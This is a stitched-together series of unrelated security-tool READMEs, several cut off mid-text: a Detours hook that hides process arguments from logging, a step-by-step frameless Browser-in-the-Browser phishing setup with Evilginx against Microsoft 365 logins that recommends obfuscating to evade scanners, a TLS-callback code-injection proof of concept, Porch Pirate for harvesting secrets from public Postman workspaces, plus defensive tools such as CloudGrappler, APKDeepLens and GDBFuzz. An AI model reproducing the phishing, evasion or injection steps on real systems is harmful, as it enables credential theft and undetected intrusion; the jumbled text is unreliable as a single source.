Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW
function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.
Custom Process Creation Function: Upon intercepting a CreateProcessW
call, the custom function is executed, creating the new process and manipulating its arguments as necessary.
PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.
Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.
Option 1: Compile NoArgs DLL:
You will need microsoft/Detours">Microsoft Detours installed.
Compile the DLL.
Option 2: Download the compiled executable (ready-to-go) from the releases page.
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.
This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.
Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. โถ Watch Video
โ๏ธ Buy Me A Coffee
This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.
Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.
That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.
The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.
In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.
A Browser In The Browser (BITB) without any iframes! As simple as that.
Meaning that we can now use BITB with Evilginx on websites like Microsoft.
Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.
Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)
Update and Upgrade system packages:
sudo apt update && sudo apt upgrade -y
Create a new evilginx user, and add user to sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Test that evilginx user is in sudo group:
su - evilginx
sudo ls -la /root
Navigate to users home dir:
cd /home/evilginx
(You can do everything as sudo user as well since we're running everything locally)
Download and build Evilginx: Official Docs
Copy Evilginx files to /home/evilginx
Install Go: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
ADD: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Check:
go version
Install make:
sudo apt install make
Build Evilginx:
cd /home/evilginx/evilginx2
make
Create a new directory for our evilginx build along with phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy build, phishlets, and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Ubuntu firewall quick fix (thanks to @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you get Failed to start nameserver on: :53
error, try modifying this file
sudo nano /etc/systemd/resolved.conf
edit/add the DNSStubListener
to no
> DNSStubListener=no
then
sudo systemctl restart systemd-resolved
Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.
nano ~/.evilginx/config.json
CHANGE https_port
from 443
to 8443
Install Apache2:
sudo apt install apache2 -y
Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start and enable Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.
Install git if not already available:
sudo apt -y install git
Clone this repo:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Make directories for the pages we will be serving:
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy the directories for each page:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Optional: Remove the default Apache page (not used):
sudo rm -r /var/www/html/
Copy the O365 phishlet to phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js
and change the CALENDLY_PAGE_NAME
and CALENDLY_EVENT_TYPE
.
Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html
in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.
Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.
We will use the domain fake.com
which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)
Create dir and parents if they do not exist:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Generate the SSL certs using the OpenSSL config file:
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Modify private key permissions:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Copy custom substitution files (the core of our approach):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.
Both config files under /apache-configs/
are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)
# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
Simply to make it easier, I included both versions as separate files for this next step.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Test Apache configs to ensure there are no errors:
sudo apache2ctl configtest
Restart Apache to apply changes:
sudo systemctl restart apache2
Get the IP of the VM using ifconfig
and note it somewhere for the next step.
We now need to add new entries to our hosts file, to point the domain used in this demo fake.com
and all used subdomains to our VM on which Apache and Evilginx are running.
On Windows:
Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)
Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:
C:\Windows\System32\drivers\etc\
Change the file types (bottom-right) to "All files".
Double-click the file named hosts
On Mac:
Open a terminal and run the following:
sudo nano /private/etc/hosts
Now modify the following records (replace [IP]
with the IP of your VM) then paste the records at the end of the hosts file:
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Save and exit.
Now restart your browser before moving to the next step.
Note: On Mac, use the following command to flush the DNS cache:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME]
but remember to replace the 127.0.0.1
with the actual local IP of your VM.
Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com
so we need to make our host machine trust the certificate authority that signed the SSL certs.
For this step, it's easier to follow the video instructions, but here is the gist anyway.
Open https://fake.com/ in your Chrome browser.
Ignore the Unsafe Site warning and proceed to the page.
Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.
Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".
On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust
Now RESTART your Browser
You should be able to visit https://fake.com
now and see the homepage without any SSL warnings.
At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.
Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)
sudo apt install tmux -y
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx
)
Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.
blacklist noadd
Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/
This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.
It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.
To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:
It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.
The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.
It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini
to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto
, so they appear in the context menus.
The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.
You can simply download the stable versions from the release section, where you can also find the installer.
Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
You will find the binary in the folder bin\updater\updater.exe
.
This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.
Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w
argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w
argument with the --dump
command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals
argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump
argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples
directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.
APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:
To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:
git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help
git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help
To simply scan an APK, use the below command. Mention the apk file with -apk
argument. Once the scan is complete, a detailed report will be displayed in the console.
python3 APKDeepLens.py -apk file.apk
If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source
parameter.
python3 APKDeepLens.py -apk file.apk -source <source-code-path>
To generate detailed PDF and HTML reports after the scan you can pass -report
argument as mentioned below.
python3 APKDeepLens.py -apk file.apk -report
We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.
For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)
New Module 34: TLS Callbacks For Anti-Debugging
New Module 35: Threadless Injection
The PoC follows these steps:
CreateProcessViaWinAPIsW
function (i.e. RuntimeBroker.exe
).g_FixedShellcode
and the main payload.The g_FixedShellcode
shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.
The following image shows our implementation, RemoteTLSCallbackInjection.exe
, spawning a cmd.exe
as its main payload.
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
git clone https://github.com/justakazh/sicat.git && cd sicat
pip install -r requirements.txt
~$ python sicat.py --help
Command | Description |
---|---|
-h | Show help message and exit |
-k KEYWORD | |
-kv KEYWORK_VERSION | |
-nm | Identify via nmap output |
--nvd | Use NVD as info source |
--packetstorm | Use PacketStorm as info source |
--exploitdb | Use ExploitDB as info source |
--exploitalert | Use ExploitAlert as info source |
--msfmoduke | Use metasploit as info source |
-o OUTPUT | Path to save output to |
-ot OUTPUT_TYPE | Output file type: json or html |
From keyword
python sicat.py -k telerik --exploitdb --msfmodule
From nmap output
nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm
I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
bash pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
bash chmod +x clone.sh ./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
โโโ json
โโโ AWS
โย ย โโโ 2024-03-04 01:01 AM
โย ย โโโ cloudtrail-logs-00000000-ffffff--
โย ย โโโ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โย ย โโโ GetFileDownloadUrls.*secrets_.json
โโโ AZURE
โโโ 2024-03-04 01:01 AM
โโโ logs
โโโ cloudgrappler
โโโ okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.
.
โโโ benchmark # Scripts to build Google's fuzzer test suite and run experiments
โโโ dependencies # Contains a Makefile to install dependencies for GDBFuzz
โโโ evaluation # Raw exeriment data, presented in the paper
โโโ example_firmware # Embedded example applications, used for the evaluation
โโโ example_programs # Contains a compiled example program and configs to test GDBFuzz
โโโ src # Contains the implementation of GDBFuzz
โโโ Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
โโโ LICENSE # License
โโโ Makefile # Makefile for creating the docker image or install GDBFuzz locally
โโโ README.md # This README file
The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.
GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.
GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pie OS 32-bit. Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.
virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py
GDBFuzz reads settings from a config file with the following keys.
[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>
# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>
# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>
# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>
# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>
# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>
# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True
# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =
# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False
[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py
[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242
[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600
# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =
[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py
[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra
[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO
# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output
# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False
An example config file is located in ./example_programs/
together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/
. Start fuzzing for one hour with the following command.
chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg
We first see output from Ghidra analyzing the binary executable and susequently messages when breakpoints are relocated or hit.
Depending on the specified output_directory
in the config file, there should now be a folder trial-0
with the following structure
.
โโโ corpus # A folder that contains the input corpus.
โโโ crashes # A folder that contains crashing inputs - if any.
โโโ cfg # The control flow graph as adjacency list.
โโโ fuzzer_stats # Statistics of the fuzzing campaign.
โโโ plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
โโโ reverse_cfg # The reverse control flow graph.
By setting start_ghidra = False
in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.
For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzOneInput
entrypoint that is used by almost all fuzzers like AFL, AFL++, libFuzzer,.... In benchmark/benchSUTs/GDBFuzz_wrapper/common
There is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz
. This allows to simulate an embedded device that consumes data via a well defined input interface and therefore run GDBFuzz on any application. For convenience we created a script in benchmark/benchSUTs
that compiles all programs from our evaluation with our wrapper as explained later.
NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers therefore. The wrapper just exists for evaluation purposes to enable running benchmarks and comparisons on a scale!
The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.
make dockerimage
To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programs
and output
folder as volumes and start GDBFuzz as follows.
chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0
An output folder should appear in the current working directory with the structure explained above.
Our evaluation is split in two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independend analysis and comparisons of the results.
GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.
Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware
. For each experiment we run GDBFuzz with the RandomBasicBlock
and with the RandomBasicBlockNoCorpus
strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock
and the RandomBasicBlockNoCorpus
strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.
GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.
sudo apt-get install stlink-tools gdb-multiarch
Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.
Prerequisite: Install platformio (pio)
cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload
For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf
This .elf file is also later used in the user configuration for Ghidra.
Start a new terminal, and run the following to start the a GDB Server:
st-util
Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyACM0
is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0
in the config file to your device.
./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg
Fuzzer statistics and logs are in the ./output/... directory.
Install pyocd
:
pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'
Make sure that 'KitProg v3' is on the device and put Board into 'Arm DAPLink' Mode by pressing the appropriate button. Start the GDB server:
pyocd gdbserver --persist
Flash a firmware and start fuzzing e.g. with
gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg
Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.
cd ./example_firmware/esp32_arduinojson/
pio run --target upload
Add following line to the openocd config file for the J-Link debugger: jlink.cfg
adapter speed 10000
Start a new terminal, and run the following to start the GDB Server:
get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"
Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyUSB0
is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0
in the config file to your device.
